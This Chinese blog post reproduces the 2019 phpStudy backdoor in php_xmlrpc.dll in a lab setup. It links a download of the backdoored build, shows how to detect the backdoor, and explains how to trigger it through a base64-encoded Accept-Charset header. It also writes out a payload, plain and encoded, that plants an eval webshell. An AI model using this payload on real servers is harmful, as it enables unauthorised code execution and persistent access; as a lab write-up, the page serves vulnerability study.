<!DOCTYPE HTML>
<html lang="en">

<head>
    <!--Setting-->
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
    <meta http-equiv="Cache-Control" content="no-siteapp">
    <meta http-equiv="Cache-Control" content="no-transform">
    <meta name="renderer" content="webkit|ie-comp|ie-stand">
    <meta name="apple-mobile-web-app-capable" content="Pikachu">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="format-detection" content="telephone=no,email=no,adress=no">
    <meta name="browsermode" content="application">
    <meta name="screen-orientation" content="portrait">
    <meta name="theme-version" content="1.3.0">
    <meta name="root" content="/">
    <link rel="dns-prefetch" href="http://example.com">
    <!--SEO-->

<meta name="keywords" content="phpstudy后门漏洞复现" />


<meta name="description" content="# 漏洞介绍
2019 年 9 月 20，网上传出 phpstudy 软件存在后门，随后作者立即发布生命进行澄清，其真实情况是该软件官网在 2016 年被非法入侵，程序包自带 PHP 的 php..." />


<meta name="robots" content="all" />
<meta name="google" content="all" />
<meta name="googlebot" content="all" />
<meta name="verify" content="all" />
    <!--Title-->

<title>
    
    phpstudy后门漏洞复现 |
    
    Pikachu
</title>

<link rel="alternate" href="/atom.xml" title="Pikachu" type="application/atom+xml">


<link rel="icon" href="/favicon.ico">

    


<link rel="stylesheet" href="/css/bootstrap.min.css?rev=3.3.7.css">
<link rel="stylesheet" href="/css/font-awesome.min.css?rev=4.7.0.css">
<link rel="stylesheet" href="/css/style.css?rev=@@hash.css">

    



    

<meta name="generator" content="Hexo 5.4.2"></head>
<!--[if lte IE 8]>
<style>
    html{ font-size: 1em }
</style>
<![endif]-->
<!--[if lte IE 9]>
<div style="ie">你使用的浏览器版本过低，为了你更好的阅读体验，请更新浏览器的版本或者使用其他现代浏览器，比如Chrome、Firefox、Safari等。</div>
<![endif]-->
<body>
    <header class="main-header"  style="background-image:url(
    /img/banner.jpg)"
     >
    <div class="main-header-box">
        <a class="header-avatar" href="/" title='John Doe'>
            <img src="/img/avatar.jpg" alt="logo头像" class="img-responsive center-block">
        </a>
        <div class="branding">
            <!--<h2 class="text-hide">Snippet主题,从未如此简单有趣</h2>-->
            
            <h2>
                快乐+自信
            </h2>
            
        </div>
    </div>
</header>
    <nav class="main-navigation">
    <div class="container">
        <div class="row">
            <div class="col-sm-12">
                <div class="navbar-header"><span class="nav-toggle-button collapsed pull-right" data-toggle="collapse" data-target="#main-menu" id="mnav">
                        <span class="sr-only"></span>
                        <i class="fa fa-bars"></i>
                    </span>
                    <a class="navbar-brand" href="http://example.com">
                        Pikachu</a>
                </div>
                <div class="collapse navbar-collapse" id="main-menu">
                    <ul class="menu">
                        
                        <li role="presentation" class="text-center">
                            <a href="/"><i class="fa "></i>
                                Home</a>
                        </li>
                        
                        <li role="presentation" class="text-center">
                            <a href="/categories/web/"><i class="fa "></i>
                                Web</a>
                        </li>
                        
                        <li role="presentation" class="text-center">
                            <a href="/categories/misc/"><i class="fa "></i>
                                Misc</a>
                        </li>
                        
                        <li role="presentation" class="text-center">
                            <a href="/categories/art/"><i class="fa "></i>
                                技术教程</a>
                        </li>
                        
                        <li role="presentation" class="text-center">
                            <a href="/categories/tool/"><i class="fa "></i>
                                工具</a>
                        </li>
                        
                        <li role="presentation" class="text-center">
                            <a href="/archives/"><i class="fa "></i>
                                时间轴</a>
                        </li>
                        
                        <li role="presentation" class="text-center">
                            <a href="/categories/about/"><i class="fa "></i>
                                关于我</a>
                        </li>
                        
                    </ul>
                </div>
            </div>
        </div>
    </div>
</nav>
    <section class="content-wrap">
        <div class="container">
            <div class="row">
                <main class="col-md-8 main-content m-post">
                    <p id="process"></p>
<article class="post">
    <div class="post-head">
        <h1 id="phpstudy后门漏洞复现">
            
            phpstudy后门漏洞复现
            
        </h1>
        <div class="post-meta">
    
    <span class="categories-meta fa-wrap">
        <i class="fa fa-folder-open-o"></i>
        <a class="category-link" href="/categories/web/">web</a>
    </span>
    
    
    <span class="fa-wrap">
        <i class="fa fa-tags"></i>
        <span class="tags-meta">
            
            <a class="tag-none-link" href="/tags/phpstudy%E5%90%8E%E9%97%A8%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag">phpstudy后门漏洞复现</a>
            
        </span>
    </span>
    
    
    
    <span class="fa-wrap">
        <i class="fa fa-clock-o"></i>
        <span class="date-meta">
            2022/07/21</span>
    </span>
    
    <span class="fa-wrap">
        <i class="fa fa-eye"></i>
        <span id="busuanzi_value_page_pv"></span>
    </span>
    
    
</div>
        
        
    </div>
    
    <div class="post-body post-content">
        <h2 id="漏洞介绍"><a class="markdownIt-Anchor" href="#漏洞介绍">#</a> 漏洞介绍</h2>
<p>2019 年 9 月 20，网上传出 phpstudy 软件存在后门，随后作者立即发布生命进行澄清，其真实情况是该软件官网在 2016 年被非法入侵，程序包自带 PHP 的 php_xmlrpc.dll 模块被植入隐藏后门，可以正向执行任意 php 代码。</p>
<p>影响版本：<br>
phpStudy2016-php-5.2.17<br>
phpStudy2016-php-5.4.45<br>
phpStudy2018-php-5.2.17<br>
phpStudy2018-php-5.4.45</p>
<h2 id="环境安装"><a class="markdownIt-Anchor" href="#环境安装">#</a> 环境安装</h2>
<p>本次环境复现我们拿 phpStudy-2018 搭建</p>
<ul>
<li>phpstudy-2018 后门版：<a target="_blank" rel="noopener" href="https://pan.baidu.com/s/1s55fGSRt9N6zYpFCU8hxyw">https://pan.baidu.com/s/1s55fGSRt9N6zYpFCU8hxyw</a> 提取码:y9cg</li>
</ul>
<p>这个和正常的安装一样，只不过启动环境的时候，开启非服务模式</p>
<p><img src="https://tompikachu.oss-cn-beijing.aliyuncs.com/hexo/web/phpstudy%E5%90%8E%E9%97%A8%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/1.png" alt="image-20220721114142496"></p>
<p><img src="https://tompikachu.oss-cn-beijing.aliyuncs.com/hexo/web/phpstudy%E5%90%8E%E9%97%A8%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/2.png" alt="image-20220721114235376"></p>
<h2 id="漏洞的检测"><a class="markdownIt-Anchor" href="#漏洞的检测">#</a> 漏洞的检测</h2>
<p>如果 phpstduy 存在后门会在一下路径文件中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"># phpStudy2016路径</span><br><span class="line">php\php-5.2.17\ext\php_xmlrpc.dll</span><br><span class="line">php\php-5.4.45\ext\php_xmlrpc.dll</span><br><span class="line"></span><br><span class="line"># phpStudy2018路径</span><br><span class="line">PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll</span><br><span class="line">PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll</span><br></pre></td></tr></table></figure>
<p>如果 PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll 文件存在 @eval (% s (’% s’)); 说明存在后门</p>
<p><img src="https://tompikachu.oss-cn-beijing.aliyuncs.com/hexo/web/phpstudy%E5%90%8E%E9%97%A8%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/3.png" alt="image-20220721123100966"></p>
<h2 id="漏洞复现"><a class="markdownIt-Anchor" href="#漏洞复现">#</a> 漏洞复现</h2>
<p>我们使用 burpsite 工具抓包后把 accept-charset 添加到请求头里面去，在这个 accept-charset 后面添加需要执行的命令，但是需要进行 base64 编码<br>
 ** 注意：** 要把 gzip,deflate 中间逗号后面的空格去掉不然无法执行命令。<br>
<img src="https://tompikachu.oss-cn-beijing.aliyuncs.com/hexo/web/phpstudy%E5%90%8E%E9%97%A8%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/4.png" alt="image-20220721145301213"></p>
<p><img src="https://tompikachu.oss-cn-beijing.aliyuncs.com/hexo/web/phpstudy%E5%90%8E%E9%97%A8%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/5.png" alt="image-20220721145409916"></p>
<p>这里我们可以利用这个写入 webshell，我们先需要知道绝对路径，这里我们可以访问 phpinfo 文件<br>
<img src="https://tompikachu.oss-cn-beijing.aliyuncs.com/hexo/web/phpstudy%E5%90%8E%E9%97%A8%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/6.png" alt="image-20220721145715603"></p>
<p>这里我们知道绝对路径后就可以利用 phpstudy 后门漏洞写木马。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">fputs(fopen(&#x27;C:/phpStudy/PHPTutorial/WWW/shell.php&#x27;,&#x27;w&#x27;),&#x27;&lt;?php @eval($_POST[123]);?&gt;&#x27;)</span><br><span class="line">bas64编码后</span><br><span class="line">ZnB1dHMoZm9wZW4oJ0M6L3BocFN0dWR5L1BIUFR1dG9yaWFsL1dXVy9zaGVsbC5waHAnLCd3JyksJzw/cGhwIEBldmFsKCRfUE9TVFsxMjNdKTs/PicpOw==</span><br></pre></td></tr></table></figure>
<p><img src="https://tompikachu.oss-cn-beijing.aliyuncs.com/hexo/web/phpstudy%E5%90%8E%E9%97%A8%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/7.png" alt="image-20220721150315393"></p>
<p><img src="https://tompikachu.oss-cn-beijing.aliyuncs.com/hexo/web/phpstudy%E5%90%8E%E9%97%A8%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/8.png" alt="image-20220721150328779"></p>
<p>用 webshell 工具连接成功</p>
<p><img src="https://tompikachu.oss-cn-beijing.aliyuncs.com/hexo/web/phpstudy%E5%90%8E%E9%97%A8%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/9.png" alt="image-20220721150357659"></p>

    </div>
    
    <div class="reward" ontouchstart>
    <div class="reward-wrap">赏
        <div class="reward-box">
            
            
            <span class="reward-type">
                <img class="wechat" src="/img/reward-wepay.jpg"><b>微信打赏</b>
            </span>
            
        </div>
    </div>
    <p class="reward-tip">
        赞赏是不耍流氓的鼓励
    </p>
</div>
    
    <div class="post-footer">
        <div>
            
            转载声明：
            商业转载请联系作者获得授权,非商业转载请注明出处 © <a href="" target="_blank">Pikachuiu</a>
            
            
        </div>
        <div>
            
        </div>
    </div>
</article>
<div class="article-nav prev-next-wrap clearfix">
    
    
    <a href="/2022/07/13/hexo%E6%90%AD%E5%BB%BA/" class="next-post btn btn-default" title='github搭建hexo'>
        <span class="hidden-lg">下一篇</span>
        <span class="hidden-xs">
            github搭建hexo</span><i class="fa fa-angle-right fa-fw"></i>
    </a>
    
</div>

<div id="comments">
    
    
<div class="utteranc">
  
  <script
    src='https://utteranc.es/client.js'
    repo='shenliyang/snippet-comment'
    issue-term='pathname'
    issue-number=''
    theme='github-light'
    label=''
    crossorigin='anonymous'
    async
  ></script>
</div>



</div>

                </main>
                
                    <aside id="article-toc" role="navigation" class="col-md-4">
    <div class="widget">
        <h3 class="title">
            Table of Contents
        </h3>
        
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D"><span class="toc-text"> 漏洞介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E5%AE%89%E8%A3%85"><span class="toc-text"> 环境安装</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%A3%80%E6%B5%8B"><span class="toc-text"> 漏洞的检测</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-text"> 漏洞复现</span></a></li></ol>
        
    </div>
</aside>
                
            </div>
        </div>
    </section>
    <footer class="main-footer">
    <div class="container">
        <div class="row">
        </div>
    </div>
</footer>
<a id="back-to-top" class="icon-btn hide">
    <i class="fa fa-chevron-up"></i>
</a>
    <div class="copyright">
    <div class="container">
        <div class="row">
            <div class="col-sm-12">
                <div class="busuanzi">
    
    Total:
    <strong id="busuanzi_value_site_pv">
        <i class="fa fa-spinner fa-spin"></i>
    </strong>
    &nbsp; | &nbsp;
    Visitors:
    <strong id="busuanzi_value_site_uv">
        <i class="fa fa-spinner fa-spin"></i>
    </strong>
    
</div>
            </div>
            <div class="col-sm-12">
                <span>Copyright &copy;
                    2021
                    
                </span> |
                <span>
                    Powered by <a href="//hexo.io" class="copyright-links" target="_blank" rel="nofollow">Hexo</a>
                </span> |
                <span>
                    Theme by <a href="//github.com/shenliyang/hexo-theme-snippet.git" class="copyright-links" target="_blank" rel="nofollow">Snippet</a>
                </span>
            </div>
        </div>
    </div>
</div>



<script src="/assets/tagcanvas.min.js?rev=2.9.js"></script>

<script>
var tagOption = {
    textColour: '#444', // 字体颜色
    outlineMethod: 'block', // 选中模式
    outlineColour: '#FFDAB9', // 选中模式的颜色
    interval: 30 || 30, // 动画帧之间的时间间隔，值越大，转动幅度越大
    textHeight: 13,
    outlineRadius: 3,
    freezeActive: true || '', // 选中的标签是否继续滚动
    frontSelect: true || '', // 不选标签云后部的标签
    initial: [0.1, -0.1],
    depth: 0.5,
    decel: 0.95,
    maxSpeed: 0.03,
    reverse: true || '', // 是否反向触发
    fadeIn: 500, // 进入动画时间
    wheelZoom: false || '' // 是否启用鼠标滚轮
}
TagCanvas.Start('tag-cloud-3d', '', tagOption);
</script>


<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>


<script src="/js/app.js?rev=@@hash.js"></script>

</body>
</html>